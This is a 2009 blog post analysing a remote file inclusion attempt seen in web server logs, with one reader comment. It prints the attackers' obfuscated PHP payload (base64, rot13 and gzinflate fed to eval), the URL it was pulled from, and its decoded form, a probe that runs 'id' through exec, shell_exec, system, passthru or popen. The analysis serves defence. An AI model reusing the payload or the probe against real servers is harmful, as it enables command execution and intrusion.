1337 v0pCr3w – heh
Posted on 11 May 2009
Well, I thought this to be a humorous find in the webserver logs on a Monday afternoon.
It was an attempt to remotely load the following URL on the Aanval.com primary domain:
http://oubkhammuseum.com/templates/idvop.txt
The content of the URL (in the event is gets pulled):
[code lang=”php”]$vopcrew = “pZLNd8MwEITvgbyDIgyWIZT059Q0xdBYYg30TRCOvIpIecl15cYh5N0ryWTSUCCH3sTMzrfDosQg
TJF8/b7mH5/L6QRRcgj9TLRi9mT3srGv9CwafEEMjk0immVSSBnfgLDtR0OgdMHJxtTF8spnIjstn
DKaxDkJ2cGnLYQOduonlCR5Blrr9oMdfCXZGOPQK2fIRehOpNHNwzMOzwMoLD4Bv43SjH52bTaOvk
eNYw2IFdQ1v2BCjPyiD4VhQ/booDkVMxuOrrCOhUM+S3TIyPdQW2NcGO1Ae1Gc9SLokosaCs1hrHk
LUUrZ7urS0fz32lwh90TTTAEskQHRmhb0Y2t3dvb3dzR8il2ld2CzXIKRPpJy5ECif+fD0k9EbWh+
v2trypbkGMqK2mCgx9VeseA6q3AoKL8=”;
eval(gzinflate(str_rot13(base64_decode($vopcrew))));
exit;[/code]
And of course, the decoded PHP version that they would prefer to have executed:
[code lang=”php”]$os = @PHP_OS;
echo “v0pCr3w”;
echo “os:$os”;
$cmd=”id”;
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(‘exec’)){
@exec($cfe,$res);
$res = join(“\n”,$res);
}
elseif(function_exists(‘shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(‘system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(‘passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}[/code]
Essentially, it is an attempt to identify the current user the web process is running under. As you can see they create the function ex(), which contains a simple iterative if / else / else / etc statement to test as many possible avenues to execute the shell command “id” to provide this information.
A quick search around the net provided the little perl scanner tool used:
http://www.loyalmoses.com/junk/vopcrew_multiscanner.txt
The offending IP apparently belongs to HostMySite which owns a good sized net block:
208.112.87.9
OrgName: HostMySite
Address: 650 Pencader Drive
City: Newark
StateProv: DE
PostalCode: 19702
Country: US
Rather amateurish, but effective. 😉
1 Response to 1337 v0pCr3w – heh
LinkedIn
Hi,
i have got same problem but this means that they have tried to download that file on my server or have verified that it was already on my server?
Regards
Gigi